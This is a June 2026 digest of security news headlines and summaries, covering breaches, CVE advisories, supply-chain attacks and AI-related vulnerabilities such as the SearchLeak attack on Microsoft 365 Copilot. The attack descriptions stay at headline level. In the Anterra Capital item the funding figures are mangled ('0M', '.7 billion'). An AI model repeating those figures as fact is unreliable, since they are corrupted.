News from the specialist press

The Government Just Made Our Case: Stop Fixing Everything, Fix What Matters.
CISA made risk-based prioritization federal policy. That's the problem we've been working on for years.
https://www.legitsecurity.com/blog/the-government-just-made-our-case-stop-fixing-everything-fix-what-matters

OptinMonster WordPress plugin hacked in CDN supply-chain attack
WordPress plugins OptinMonster, TrustPulse, and PushEngage have been compromised in a supply-chain attack impacting Awesome Motive's content distribution network (CDN). [...]
https://www.bleepingcomputer.com/news/security/optinmonster-wordpress-plugin-hacked-in-cdn-supply-chain-attack/

NIS2 is raising the bar. Here's how to turn readiness into resilience.
The NIS2 directive asks covered organizations to take a more structured approach to risk management, governance, supply chain security, and incident reporting. It expands the scope of who may be covered, raises expectations around management body accountability, introduces clearer and more enforceable requirements, and increases pressure on organizations to show that security is being managed in a consistent, defensible way. Reporting timelines are one of the most visible parts of that shift, with early warning required within 24 hours of awareness for significant incidents, incident notification within 72 hours, and a final report within one month. It also arrived in a landscape that is still uneven, with member states continuing to implement the directive in different ways across the EU. That...
https://www.rapid7.com/blog/post/so-nis2-compliance-turn-readiness-into-resilience

Does Your Security Programme Align With NIS2 Requirements?
If your organization operates in the EU, or works with organizations that do, NIS2 is no longer something on the horizon. It is here and it applies to a far wider range of sectors than its predecessor, the original NIS Directive (Directive (EU) 2016/1148), and it comes with real consequences for organizations that cannot demonstrate they are meeting its requirements. The good news? You do not have to figure out how to approach it alone. Rapid7 has developed a dedicated NIS2 resource page that shows how the Command Platform can support key technical and operational aspects of NIS2 readiness, highlights common security program gaps, and explains where our solutions can help strengthen visibility, prioritization, detection, and reporting readiness. It is not a substitute for the broader organizational,...
https://www.rapid7.com/blog/post/so-aligning-security-programmes-with-nis2-requirements

USN-8431-1: Ruby vulnerabilities
It was discovered that Ruby's Net::IMAP library did not properly verify that Transport Layer Security (TLS) encryption was started after issuing a STARTTLS command. A remote attacker could possibly use this issue to perform a machine-in-the-middle attack and silently bypass TLS encryption. (CVE-2026-42246) It was also discovered that Ruby's Net::IMAP library did not validate string arguments passed to certain commands. A remote attacker could possibly use this issue to inject arbitrary IMAP commands. (CVE-2026-42257)
https://ubuntu.com/security/notices/USN-8431-1

Cisco fixes SD-WAN vManage flaw exploited in zero-day attacks
Cisco has released security updates to address a vulnerability in the Catalyst SD-WAN Manager, tracked as CVE-2026-20262, that was exploited in attacks to escalate to root privileges. [...]
https://www.bleepingcomputer.com/news/security/cisco-fixes-sd-wan-vmanage-flaw-exploited-in-zero-day-attacks/

China-Nexus Actor Spies on US Researchers Undetected for a Year
Google discovered and disrupted the sprawling campaign, which stole RedCAP credentials to target numerous institutions and exfiltrate sensitive data.
https://www.darkreading.com/threat-intelligence/china-nexus-actor-us-researchers-undetected

Microsoft Site Showing Warning Following Certificate Expiry
Microsoft seems to have failed at certificate management after a domain used by sysadmins globally to test connectivity to Microsoft 365 started generating untrusted connection warnings in browsers on Monday. The connectivity.office.com domain, a widely relied-upon tool for IT professionals to verify their network’s connectivity to Microsoft 365 and confirm that firewalls aren’t silently blocking critical […] The post Microsoft Site Showing Warning Following Certificate Expiry appeared first on Cyber Security News.
https://cybersecuritynews.com/microsoft-certificate-expiry/

LiteLLM Vulnerability Chain Lets Low-Privilege Users Take Over AI Gateway Servers
A default low-privilege account on a LiteLLM proxy can climb to full admin and run code on the server by chaining three vulnerabilities, researchers at Obsidian Security disclosed. LiteLLM is a widely deployed open-source AI gateway that brokers calls to more than 100 model providers behind one OpenAI-compatible interface. A server takeover exposes every provider key it holds, the secrets that
https://thehackernews.com/2026/06/litellm-vulnerability-chain-lets-low.html

Council of Europe investigates ShinyHunters data breach claims
The Council of Europe, the continent's oldest intergovernmental body, is probing claims of a data breach made by the ShinyHunters extortion group over the weekend. [...]
https://www.bleepingcomputer.com/news/security/council-of-europe-investigates-shinyhunters-data-breach-claims/

DPAPISnoop Tool Extracts CREDHIST Hashes for Offline Windows Credential Recovery
The open-source DPAPISnoop tool has been enhanced to extract CREDHIST entries, enabling offline cracking of historical Windows credentials and deeper insight into password patterns. Lefteris Panos, Security Consultant at LRQA Red Team, said the update adds CREDHIST extraction capabilities to DPAPISnoop, enabling the recovery and analysis of historical Windows credentials alongside DPAPI Master Key hashes. […] The post DPAPISnoop Tool Extracts CREDHIST Hashes for Offline Windows Credential Recovery appeared first on Cyber Security News.
https://cybersecuritynews.com/dpapisnoop-tool-extracts-credhist-hashes/

SHADOWBYT3$ Allegedly Claim Breach of Nintendo, Stealing Sensitive Data
Threat intelligence sources have reported that the threat actor group SHADOWBYT3$ has allegedly breached Nintendo, claiming to have exfiltrated approximately 859 MB of sensitive internal data. The incident, first observed on June 13, 2026, remains unverified at the time of writing. However, early details suggest potential exposure of employee-related information. The alleged breach is linked […] The post SHADOWBYT3$ Allegedly Claim Breach of Nintendo, Stealing Sensitive Data appeared first on Cyber Security News.
https://cybersecuritynews.com/shadowbyt3-claim-breach-of-nintendo/

Microsoft Defender email security benchmarking: Key insights from one year of data
See how Microsoft Defender performed in one year of real-world email security benchmarking against SEG and ICES vendors. The post Microsoft Defender email security benchmarking: Key insights from one year of data appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2026/06/15/microsoft-defender-email-security-benchmarking-key-insights-from-one-year-of-data/

FBI: Fraudsters use couriers to steal money in crypto scams
The U.S. Federal Bureau of Investigation (FBI) warned that criminals are using couriers to collect money from victims of cryptocurrency investment scams, also known as pig butchering or romance baiting. [...]
https://www.bleepingcomputer.com/news/security/fbi-fraudsters-use-couriers-to-steal-money-in-crypto-scams/

My Instructor Said “You Can't Get a Shell.” I Got Root. — Full Web Pentest Exam Write-Up
Author: Shikhali Jamalzade. GitHub: github.com/alisalive. LinkedIn: linkedin.com/in/camalzads. Disclosure Notice: This assessment was conducted as a formal practical examination under the supervision of MilliSec LLC. The target application, VanguardCorp Hotel Management System, was a purpose-built CTF/exam environment deployed specifically for this assessment on May 24, 2026. No real user data was involved. All exploitation was performed within an isolated lab network. This write-up is published strictly for educational purposes. The Setup: Before the exam started, my instructor — the person who built the target application from scratch — looked me in the eye and said: “You can't get a shell from this site. I haven't left that kind of vulnerability.” 5 minutes later, I had...
https://infosecwriteups.com/my-instructor-said-you-cant-get-a-shell-i-got-root-full-web-pentest-exam-write-up-a82c804ce8e2?source=rss----7b722bfd1b8d---4

Connectors CTF 2025 — DFIR Challenges
Happy to share my write-up for solving 3/3 DFIR challenges from CONCTF 2025. Although I didn't attend the finals, I successfully completed all the DFIR challenges independently. You can read this writeup on my GitBook account: Link. We got a malicious document file, which has macros and other stuff. First step is to extract the document file “Invoice_Q1–2021.doc” as any other zip or rar file: and so on. After extracting the file, we can view all the malicious stuff. Starting with the “Invoice_Q1–2021\word\vbaData.xml” file, we can get the full MacroName, which is “PROJECT.AYAIQ5.AUTOOPEN”. Moving on to another file, “Invoice_Q1–2021\word\document.xml”, we can see a lot of malicious stuff that needs more investigation: <w:t><html><body><div...
https://infosecwriteups.com/connectors-ctf-2025-dfir-challenges-6d66c31cce9a?source=rss----7b722bfd1b8d---4

Silent Breach Lab Writeup (CyberDefenders)
Silent Breach | Blue team challenge. You can read this writeup on my GitBook account: Link. Scenario: The IMF is hit by a cyber attack compromising sensitive data. Luther sends Ethan to retrieve crucial information from a compromised server. Despite warnings, Ethan downloads the intel, which later becomes unreadable. To recover it, he creates a forensic image and asks Benji for help in decoding the files. Resources: Windows Mail Artifacts: Microsoft HxStore.hxd (email) Research. Q1: What is the MD5 hash of the potentially malicious EXE file the user downloaded? After opening the downloaded artifacts file with FTK Imager, we are looking for an executable “.exe” file that seems malicious. We can see a malicious file in “/Downloads” called “IMF-Info.pdf.exe”. .pdf.exe !!!!!! Of course it's not a normal...
https://infosecwriteups.com/silent-breach-lab-writeup-cyberdefenders-c766dc7a9acb?source=rss----7b722bfd1b8d---4

Anthropic Updated Privacy Policy to Include Identity Verification for Claude Users
Anthropic has updated its privacy policy for Claude, adding explicit terminology that allows the company to perform age and identity verification on consumer users. The change signals a tighter security and compliance stance across Claude Free, Pro, and Max plans. It is scheduled to take effect on July 8, 2026. In the revised policy, Anthropic […] The post Anthropic Updated Privacy Policy to Include Identity Verification for Claude Users appeared first on Cyber Security News.
https://cybersecuritynews.com/anthropic-updated-privacy-policy/

Meet Meshy: HackerNoon Company of the Week
Meshy is the leading AI 3D model generator with 10M+ users and 100M+ models generated. Featured as HackerNoon's Company of the Week, June 2026.
https://hackernoon.com/meet-meshy-hackernoon-company-of-the-week?source=rss

One-Click Microsoft 365 Copilot Flaw Could Have Let Attackers Steal Emails, Files, and MFA Codes
A single click on a trusted Microsoft link could have let an attacker pull emails, calendar details, and indexed files out of Microsoft 365 Copilot Enterprise Search. Researchers at Varonis Threat Labs chained three bugs into a one-click exfiltration path they call SearchLeak. Because the link pointed to a real microsoft.com domain, traditional anti-phishing and URL filtering tools were
https://thehackernews.com/2026/06/one-click-microsoft-365-copilot-flaw.html

The Beginning of the End of Social Engineering
AI-native operating systems are shifting the responsibility to stay vigilant against social engineering cyberattacks from the user onto the system itself.
https://www.darkreading.com/cyberattacks-data-breaches/beginning-end-social-engineering

Critical Microsoft 365 Copilot Vulnerability Allows Attackers to Steal Data in One Click
A critical vulnerability chain in Microsoft 365 Copilot Enterprise let attackers steal sensitive corporate data, MFA codes, email contents, calendar details, and confidential files with nothing more than a single click on a link pointing to a legitimate Microsoft domain. Dubbed SearchLeak, uncovered by Varonis Threat Labs and tracked as CVE-2026-42824, the flaw earned […] The post Critical Microsoft 365 Copilot Vulnerability Allows Attackers to Steal Data in One Click appeared first on Cyber Security News.
https://cybersecuritynews.com/microsoft-365-copilot-one-click-vulnerability/

PDFSharp C# Review: Useful, Lightweight, but Limited in Scope
PDFSharp is stronger in 2026, with signatures, PDF/A, and PDF/UA support — but HTML rendering and rasterization remain outside its scope.
https://hackernoon.com/pdfsharp-c-review-useful-lightweight-but-limited-in-scope?source=rss

Anatomy of a Critical SQL Injection: Lessons From CVE-2020-24932
CVE-2020-24932 was a critical SQL injection vulnerability in Complaint Management System v1.0 that stemmed from directly embedding user input into a database query. This article examines the root cause, disclosure timeline, impact, and remediation strategies, while highlighting how insecure tutorial code can propagate into real-world deployments.
https://hackernoon.com/anatomy-of-a-critical-sql-injection-lessons-from-cve-2020-24932?source=rss

Beyond the Score: Using AI to Translate CVEs into Real-World Business Risk
Security leaders rarely struggle to gather data, but they often struggle to turn that data into something clear and meaningful for the business. In a typical week, a CISO might receive a report listing hundreds or even thousands of vulnerabilities, most of them accompanied by CVSS scores that make the entire list look urgent, while also managing the wider set of operational, regulatory, and strategic demands that already come with the role.That difficulty becomes more obvious when the same information has to be carried into the boardroom, where the questions are rarely about CVE IDs or exploit counts in isolation. What leadership wants to understand is whether the organization's revenue, uptime, legal exposure, or broader resilience could be affected, and how quickly those risks need to...
https://www.rapid7.com/blog/post/ai-beyond-the-score-translating-cves-into-real-business-risk

Designing Guardrails for AI Agents That Spend Real Money
Agent-initiated payments are moving into production through frameworks such as Stripe and OpenAI's Agentic Commerce Protocol and Google's AP2. As software gains authority to spend on behalf of users and organizations, the key challenge shifts from authentication to governance. This article explores the controls, guardrails, liability concerns, and delegation frameworks needed to make autonomous payments trustworthy and auditable.
https://hackernoon.com/designing-guardrails-for-ai-agents-that-spend-real-money?source=rss

Claude Fable 5 and Mythos 5 “abruptly disabled” after US gov. ban
Anthropic has been ordered by the US government to cut off its newest Claude Fable 5 and Mythos 5 models for fear of abuse.
https://www.malwarebytes.com/blog/ai/2026/06/claude-fable-5-and-mythos-5-abruptly-disabled-after-us-gov-deems-them-too-clever

Deepfake porn sites are going offline (re-air) (Lock and Code S07E12)
This week on the Lock and Code podcast, we revisit an episode from 2024 with David Chiu that shows the progress made against deepfake porn.
https://www.malwarebytes.com/blog/podcast/2026/06/deepfake-porn-sites-are-going-offline-re-air-lock-and-code-s07e12

Anterra Capital Reaches 0M First Close for Fund III to Back AI in the T Food Industry
Anterra Capital announced a 0 million first close on Fund III in June 2026, targeting 0 million, with backing from Rabobank, Novo Holdings, and Zoetis among others. Anterra Capital is a specialist food and agriculture venture firm founded in Amsterdam in 2013, with offices in Amsterdam and Boston, managing over 0 million across three funds. Anterra builds companies from scratch in addition to backing them; its company creation Invetx was founded in 2018 and sold to Dechra Pharmaceuticals for up to 0 million within six years. Anterra's company creation Enko Chem, founded in 2017, develops new crop protection chemistry to replace glyphosate, with research partnerships with Bayer and Syngenta. Global agrifoodtech venture funding peaked at .7 billion in 2021 before falling to...
https://hackernoon.com/anterra-capital-reaches-0m-first-close-for-fund-iii-to-back-ai-in-the-t-food-industry?source=rss

Scaling AI Inference on Kubernetes: The Case for Token-Based Autoscaling
HPA scales on request count - but LLM requests aren't equal. A 200-token prompt and an 8,000-token doc hit your GPU completely differently. Scale on token throughput ratio instead, wire it into a custom HPA metric, and rewrite your SLOs around p95 TTFT. Your GPU utilization will thank you.
https://hackernoon.com/scaling-ai-inference-on-kubernetes-the-case-for-token-based-autoscaling?source=rss

Vibe coders are gonna vibe code: How CISOs are tackling code sprawl
Employees are increasingly building automations, agents, and apps with AI tools outside traditional security oversight. Tines explores how CISOs are handling AI-driven code sprawl, shadow tooling, and governance challenges. [...]
https://www.bleepingcomputer.com/news/security/vibe-coders-are-gonna-vibe-code-how-cisos-are-tackling-code-sprawl/

The TechBeat: I Shipped 50 AI-Generated 3D Assets Into a Unity URP Pipeline. Here's What Actually Held Up. (6/15/2026)
How are you, hacker? 🪐 Want to know what's trending right now? The Techbeat by HackerNoon has got you covered with fresh content from our trending stories of the day! Set email preference here. Vibe Coding Ends at Localhost, by @dmytrochervonyi [7 min read]: AI coding agents got brilliant at writing code and stayed useless at deploying it. The reason isn't intelligence — it's that deployment breaks the feedback loop. Read More. What is the A.G.E.N.T.I.C. Framework?, by @sultan-ssh [8 min read]: A seven-phase methodology for earning brand visibility and sales across AI search and agentic commerce. Read More. I Shipped 50 AI-Generated 3D Assets Into a Unity URP Pipeline. Here's What Actually Held Up., by @marcus_chenn [7 min read] ...
https://hackernoon.com/6-15-2026-techbeat?source=rss

163 Blog Posts To Learn About Seo Tips
Let's learn about Seo Tips via these 163 free blog posts. They are ordered by HackerNoon reader engagement data. Visit the Learn Repo or LearnRepo.com to find the most read blog posts about any technology. SEO tips are practical recommendations and strategies designed to improve a website's visibility and ranking in search engine results. Implementing these tips helps businesses attract more organic traffic, increasing their online presence and potential customer reach. 1. Will Guest Posting Still be a Good SEO Strategy in 2023? This article will examine when and why guest posting is a good idea. We will also cover some Guest Posting tips to help you get the most out of this strategy. 2. Why You Must Use Next.js to Get the Benefits of React 3. The Best SEO is No SEO Always take content...
https://hackernoon.com/163-blog-posts-to-learn-about-seo-tips?source=rss

Chinese hackers breach REDCap servers, steal medical research
A China-linked espionage campaign targeted exposed REDCap servers to deploy the InfiniteRed malware and steal sensitive data from a medical institution in North America. [...]
https://www.bleepingcomputer.com/news/security/chinese-hackers-breach-redcap-servers-steal-medical-research/

⚡ Weekly Recap: Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More
Stuff broke again. Not in a movie way. An old tool was left exposed. An abandoned package was abused. A deprecated feature was still running in prod. This week is the same lesson in a new form: phishing kits are easier to rent, AI names are useful bait, old login paths still fail, and forgotten software keeps becoming someone else's entry point. Scroll through the full Monday Cybersecurity
https://thehackernews.com/2026/06/weekly-recap-chrome-0-day-unifi.html

Feds Seize CFAKE and SOCFAKE Over Explicit Deepfakes of Famous Women
Both CFAKE and SOCFAKE (CFAKE.com and SOCFAKE.com) were seized after prosecutors said they hosted nonconsensual nude digital forgeries of famous women.
https://hackread.com/feds-seize-cfake-and-socfake-explicit-deepfakes-women/

Whisper Is Free and It's Good. Here's Why We Still Beat It.
Whisper is free, runs locally, and is genuinely good. So what happens when you benchmark your paid on-device speech model against it? We did exactly that — and the memory numbers surprised us more than the speed. Plus why audio transformers break quantization tools that work fine on LLMs, and the honest cases where Whisper still wins.
https://hackernoon.com/whisper-is-free-and-its-good-heres-why-we-still-beat-it?source=rss

The Million-Dollar Blind Spot: Why Traditional Finance Can't Track Product ROI
Traditional corporate accounting treats technology infrastructure like a static utility bill, which completely hides its true impact on revenue expansion. To fix this blind spot, modern engineering organizations must connect low-level operational telemetry—like unit cost behavior, latency metrics and resource tags—directly into their financial models to treat technology as a measurable, scalable asset.
https://hackernoon.com/the-million-dollar-blind-spot-why-traditional-finance-cant-track-product-roi?source=rss

awk: The Unix Tool That Thinks in Columns and Conditions
awk is the tool that does what grep, cut, and sort cannot do alone — filter by field value, perform arithmetic, count with associative arrays, and format output, all in one pass. This article covers how awk thinks, every practical flag and built-in variable, and real security patterns, including UID 0 detection, HTTP status filtering, brute-force source ranking, and exfiltration hunting in access logs.
https://hackernoon.com/awk-the-unix-tool-that-thinks-in-columns-and-conditions?source=rss

The Architecture of Local-First AI Memory: No Cloud, No Keys, No Read-Time LLMs
PMB is a local-first memory system for AI agents that stores knowledge in SQLite and LanceDB, avoids LLM calls on the read path, and prioritizes fast, deterministic retrieval. This article explores the storage model, asynchronous write path, hybrid retrieval architecture, memory lifecycle management, and the design principles behind persistent agent memory that remains fully under user control.
https://hackernoon.com/the-architecture-of-local-first-ai-memory-no-cloud-no-keys-no-read-time-llms?source=rss

Cybercrime is Accelerating: Preparing the Next Wave of Cybersecurity Experts
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jun. 15, 2026 – Read the full story from CMBlog By harnessing AI, cybercriminals are developing increasingly sophisticated techniques to commit their crimes, posing a growing threat to businesses, institutions, and individuals worldwide. The post Cybercrime is Accelerating: Preparing the Next Wave of Cybersecurity Experts appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/cybercrime-is-accelerating-preparing-the-next-wave-of-cybersecurity-experts/

Novo Nordisk Confirms Data Theft: What Attackers Took and What They Didn't
Novo Nordisk suffered a cyberattack where clinical trial data was copied. The breach is confirmed, but no threat actor has claimed responsibility. The Danish pharmaceutical giant Novo Nordisk disclosed a cybersecurity breach that resulted in unauthorized access to internal IT systems and the theft of personal data. The company sells some of the most in-demand […]
https://securityaffairs.com/193650/security/novo-nordisk-confirms-data-theft-what-attackers-took-and-what-they-didnt.html

Hackers Use Microsoft Graph Reconnaissance to Target Payroll and HR Employees
Hackers are using Microsoft’s own cloud tools to quietly hunt down payroll and HR staff inside corporate networks, then reroute employee salaries to accounts they control. Security teams are racing to respond as the campaign continues to spread across industries and borders. The attack method is deceptively clean. Instead of planting malware or exploiting software […] The post Hackers Use Microsoft Graph Reconnaissance to Target Payroll and HR Employees appeared first on Cyber Security News.
https://cybersecuritynews.com/hackers-use-microsoft-graph-reconnaissance/

USN-8428-1: tmux vulnerability
It was discovered that tmux incorrectly handled image cleanup, leading to a use-after-free vulnerability. A local attacker could possibly use this issue to cause tmux to crash, resulting in a denial of service.
https://ubuntu.com/security/notices/USN-8428-1

New attack turned Microsoft 365 Copilot into 1-click data theft tool
A critical vulnerability chain dubbed SearchLeak in Microsoft 365 Copilot Enterprise could allow attackers to steal sensitive data from a target's mailbox, OneDrive, or SharePoint account through a specially crafted URL. [...]
https://www.bleepingcomputer.com/news/security/new-attack-turned-microsoft-365-copilot-into-1-click-data-theft-tool/

USN-8398-3: nginx vulnerability
USN-8398-1 fixed a vulnerability in nginx. The update caused a regression and was temporarily reverted in USN-8398-2. This update introduces a complete fix for CVE-2026-49975. We apologize for the inconvenience. Original advisory details: It was discovered that nginx incorrectly handled certain cookie headers in the HTTP/2 implementation. A remote attacker could possibly use this issue to cause nginx to consume excessive resources, resulting in a denial of service.
https://ubuntu.com/security/notices/USN-8398-3

China-Nexus Hackers Use Backdoored PAM Modules for Credential Theft and Authentication Bypass
A sophisticated China-linked threat actor known as Velvet Ant has been running a long-term cyber intrusion inside a major organization’s internal network, going undetected for nearly a decade. The campaign, now called Operation Highland, revealed a level of patience and technical depth rarely seen in publicly documented intrusions. What made this attack particularly alarming was […] The post China-Nexus Hackers Use Backdoored PAM Modules for Credential Theft and Authentication Bypass appeared first on Cyber Security News.
https://cybersecuritynews.com/china-nexus-hackers-use-backdoored-pam-modules/

Infinite Campus data breach affects 137,000 school staff accounts
The ShinyHunters extortion gang stole personal information from more than 137,000 school staff accounts in a Salesforce data theft attack that targeted the widely used Infinite Campus K-12 student information system in March. [...]
https://www.bleepingcomputer.com/news/security/infinite-campus-data-breach-affects-137-000-school-staff-accounts/

US Cracks Down on Anthropic AI Models Amid Abuse Concerns
Anthropic abruptly suspended all access to Fable 5 and Mythos 5 after receiving an export control directive that banned foreign nationals from using the technology.
https://www.darkreading.com/cyber-risk/us-cracks-down-anthropic-ai-models-abuse-concerns

SearchJack Campaign Uses 23 Chrome Extensions to Hijack Searches of 758,000 Users
A coordinated campaign of 23 deceptive Chrome browser extensions has been quietly stealing users’ search queries and routing them through hidden revenue systems. The operation, now dubbed SearchJack, has affected roughly 758,000 Chrome users worldwide without any of them realizing their searches were being hijacked. Each extension presents itself as a useful tool, from satellite […] The post SearchJack Campaign Uses 23 Chrome Extensions to Hijack Searches of 758,000 Users appeared first on Cyber Security News.
https://cybersecuritynews.com/searchjack-campaign-uses-23-chrome-extensions/

Webinar: How behavioral AI stops phishing and account takeovers
Modern phishing, BEC, and account takeover attacks increasingly bypass traditional email defenses and create operational strain for security teams. This webinar explores how behavioral AI can help automate detection, investigation, and remediation to reduce alert fatigue and accelerate response times. [...]
https://www.bleepingcomputer.com/news/security/webinar-how-behavioral-ai-stops-phishing-and-account-takeovers/

USN-8405-2: CUPS regression
USN-8405-1 fixed vulnerabilities in CUPS. The update introduced a regression that caused CUPS to crash when parsing certain large printer PPD files. This update fixes the problem. Original advisory details: Ariel Silver discovered that CUPS incorrectly handled username comparisons during authorization checks. A local attacker could possibly use this issue to gain unauthorized access to restricted operations. (CVE-2026-27447) Asim Viladi Oglu Manizada discovered that CUPS incorrectly handled notify-recipient-uri values in the RSS notifier. A remote attacker could possibly use this issue to overwrite lp-writable files and cause a denial of service. (CVE-2026-34978) Jacob Newman discovered that CUPS incorrectly handled filter option strings when processing job attributes. An attacker...
https://ubuntu.com/security/notices/USN-8405-2

Handala Hacking Group Claims Breach of California Water Service
The Handala hacking group claims it has targeted California Water Service, leaking 5GB of customer database and GPS network files in its latest infrastructure attack.
https://hackread.com/handala-hacking-group-california-water-service-breach/

USN-8427-1: Mesa vulnerability
It was discovered that Mesa did not properly validate memory allocation sizes in WebGPU under certain circumstances. An attacker could use this issue to cause Mesa to crash, resulting in a denial of service, or possibly execute arbitrary code.
https://ubuntu.com/security/notices/USN-8427-1

PromptSnatcher Ad Blocker Extensions Steal AI Chats From ChatGPT, Claude, and Gemini
Two browser extensions masquerading as ad blockers have been caught secretly recording private conversations from ChatGPT, Claude, Gemini, and five other major AI platforms. The extensions, named "Smart Adblocker" and "Adblock for Browser," were installed by roughly 90,000 users before the scheme was uncovered. Users genuinely received ad-blocking functionality while their most sensitive AI conversations […]
https://cybersecuritynews.com/promptsnatcher-ad-blocker-extensions-steal-ai-chats/

The Onboarding Password Mistake That Creates Unnecessary Risk
Employee onboarding is a busy time for IT teams. New starters need devices, accounts, access permissions, and passwords, all delivered within a tight timeframe. That usually means sharing a temporary "first-day" password so employees can access systems for the first time. The issue is that these passwords don't always stay temporary. They may be sent over email or SMS, reused across accounts,
https://thehackernews.com/2026/06/the-onboarding-password-mistake-that.html

Palo Alto Warns of Exploitation of VPN Bypass Exploits (CVE-2026-0257) in PAN-OS Flaw
Palo Alto Networks warns that attackers are actively exploiting CVE-2026-0257, a PAN-OS flaw that lets unauthorized users bypass authentication and establish VPN connections. Palo Alto Networks has confirmed active exploitation of CVE-2026-0257, a PAN-OS authentication bypass vulnerability affecting GlobalProtect portals and gateways. Palo Alto Networks addressed the vulnerability on May 13. Two weeks later, cybersecurity firm Rapid7 […]
https://securityaffairs.com/193638/security/palo-alto-warns-of-exploitation-of-vpn-bypass-exploits-cve-2026-0257-in-pan-os-flaw.html

152 Chrome Wallpaper Extensions with 105K Installs Linked to Adware and Fake Traffic
Cybersecurity researchers have discovered a network of 152 Google Chrome extensions that act as new tab live wallpaper add-ons to distribute a potentially unwanted program (PUP) family. The cluster spans 38 separate Chrome Web Store publisher accounts and three brand backends: tabplugins[.]com, yowgames[.]com, and chromewallpaper[.]com. They have been collectively installed 105,000 times. The
https://thehackernews.com/2026/06/152-chrome-wallpaper-extensions-with.html

Hackers Abuse LNK Files, PowerShell, and Python Loader to Deploy NarwhalRAT
A sophisticated malware campaign is quietly targeting Korean users through a well-crafted chain of deception. Threat actors are using innocent-looking shortcut files, built-in Windows tools, and a compiled Python payload to plant a remote access trojan called NarwhalRAT on victim machines. The attack stands out for how cleverly it blends into normal system activity, making […]
https://cybersecuritynews.com/powershell-and-python-loader-to-deploy-narwhalrat/

Over 50 Android Apps Found Spreading MagicAd Trojan via Official Stores
Over 50 Android apps on official stores spread the MagicAd trojan, which uses system tricks to force background ads even after the infected apps are closed.
https://hackread.com/android-apps-magicad-trojan-official-stores/

Popular WordPress Plugin Scripts Tampered to Plant Hidden Backdoors on Sites
An attacker tampered with trusted JavaScript files used by WordPress sites running PushEngage, OptinMonster, and TrustPulse, turning those files into a way to break into the sites. When a site administrator was logged in as the file loaded, the code created an admin account under the attacker's control and installed a hidden plugin that opened a way back in. Ordinary visitors did not trigger it
https://thehackernews.com/2026/06/popular-wordpress-plugin-scripts.html

Supply Chain Attack Hits Popular WordPress Plugins Through Awesome Motive CDN
Attackers compromised Awesome Motive CDN files, backdooring WordPress sites running OptinMonster, TrustPulse, and PushEngage. Sansec researchers discovered an active supply chain attack hitting WordPress sites running OptinMonster, TrustPulse, and PushEngage, three plugins operated by Awesome Motive, one of the largest WordPress plugin companies in the world. The malicious JavaScript wasn’t sitting on any victim’s server. […]
https://securityaffairs.com/193616/malware/supply-chain-attack-hits-popular-wordpress-plugins-through-awesome-motive-cdn.html

Palo Alto's GlobalProtect Authentication Bypass Was Exploited Four Days After Disclosure
CVE-2026-0257's GlobalProtect authentication bypass went from advisory to active exploitation in four days. The recurring pattern of perimeter device failures demands more than a patch cycle.
https://latesthackingnews.com/2026/06/15/globalprotect-authentication-bypass-cve-2026-0257-exploited/

A week in security (June 8 – June 14)
A list of topics we covered in the week of June 8 to June 14 of 2026
https://www.malwarebytes.com/blog/news/2026/06/a-week-in-security-june-8-june-14

Infostealers, AI, and a 90% Affiliate Cut Fuel The Gentlemen group's Rise
The Gentlemen ransomware used infostealer credentials, AI tools, and affiliates to hit 483 victims across 66 countries in under a year. The Gentlemen surfaced as a ransomware operation in September 2025 and by June 13, 2026 had listed 483 victims on their dark-web leak site, 380 of them in 2026 alone. That makes them the […]
https://securityaffairs.com/193622/uncategorized/infostealers-ai-and-a-90-affiliate-cut-fuel-the-gentlemen-groups-rise.html

How Ransomware Works: Encryption Is the Least of Your Problems
Ransomware still encrypts files with a hybrid AES/RSA scheme, but the data theft and backup destruction that happen before encryption are where modern attacks do their real damage.
https://latesthackingnews.com/2026/06/15/how-ransomware-works-encryption-explained/

Sniper Dz Scams Target MENA Users via Fake Facebook Offers and Browser Alerts
Cybersecurity researchers have disclosed details of fraudulent activity targeting users across the Middle East and North Africa by employing various fraudulent Facebook accounts impersonating politicians, public figures, and trusted organizations. "These accounts promoted fake offers, including free mobile internet packages, financial compensation, and government subsidy programs," Group-IB
https://thehackernews.com/2026/06/sniper-dz-scams-target-mena-users-via.html

Palo Alto Warns of Active Exploitation of PAN-OS GlobalProtect VPN Flaw
Palo Alto Networks has revealed that it has observed "active exploitation" of a recently disclosed PAN-OS vulnerability by an unknown threat actor to obtain unauthorized access to GlobalProtect portals. The vulnerability in question is CVE-2026-0257 (CVSS score: 7.8), an authentication bypass flaw affecting the portal and gateway components of PAN-OS software that could be exploited by bad
https://thehackernews.com/2026/06/palo-alto-warns-of-active-exploitation.html

Berkadia - 305,216 breached accounts
In March 2026, the commercial real estate finance company Berkadia was the target of a ShinyHunters "pay or leak" extortion campaign. The group subsequently published data they alleged was taken from Berkadia's Salesforce instance, including over 300k unique email addresses as well as names, physical addresses and phone numbers, among other data.
https://haveibeenpwned.com/Breach/Berkadia

Infinite Campus - 137,123 breached accounts
In March 2026, the student information system Infinite Campus was targeted in a ShinyHunters "pay or leak" extortion campaign. The group subsequently published data they alleged was taken from Infinite Campus, containing 137k unique email addresses along with names, phone numbers, physical addresses and support tickets. Infinite Campus subsequently sent notifications, advising that the exposed data largely consisted of "names and contact information for school staff" and that "the majority is directory information commonly found on school websites".
https://haveibeenpwned.com/Breach/InfiniteCampus

News from the general press

JLR ordered 30,000 staff to reset passwords in person after cyberattack - DataBreaches.Net
Related headlines: Union urges government intervention with 100,000 jobs at risk after JLR cyber attack; Jaguar Land Rover issues update on job safety after cyber ...
https://databreaches.net/2026/06/15/jlr-ordered-30000-staff-to-reset-passwords-in-person-after-cyberattack/

Inside the FBI's Fake Town Designed to Train Agents - Newsweek
Tags: FBI, Cyber Attack, Cyber Crime, Cyberattacks, Cybersecurity, FBI Investigation. News Article: Inside the FBI's Fake Town Designed to Train ...
https://www.newsweek.com/inside-fbi-fake-town-designed-train-agents-12074307

Which Risks Are Shaping Director And Officer Agendas In 2026? - Forbes
... cyber attack. The survey also reflects an increasingly complex external environment, with geopolitical risk entering the global top seven for the ...
https://www.forbes.com/sites/johnbremen/2026/06/15/which-risks-are-shaping-director-and-officer-agendas-in-2026/

NBI: PH cyber attack suspects identified | ANC - YouTube
NBI: PH cyber attack suspects identified | ANC (678 views, 6 hours ago). #ANCNews #ANCHighlights #TopStory. Channel: ANC 24/7 (3.11M).
https://www.youtube.com/watch?v=49ub7sOn0aI

Irish hospital fined €300,000 over cyber attack on patient data - MLex
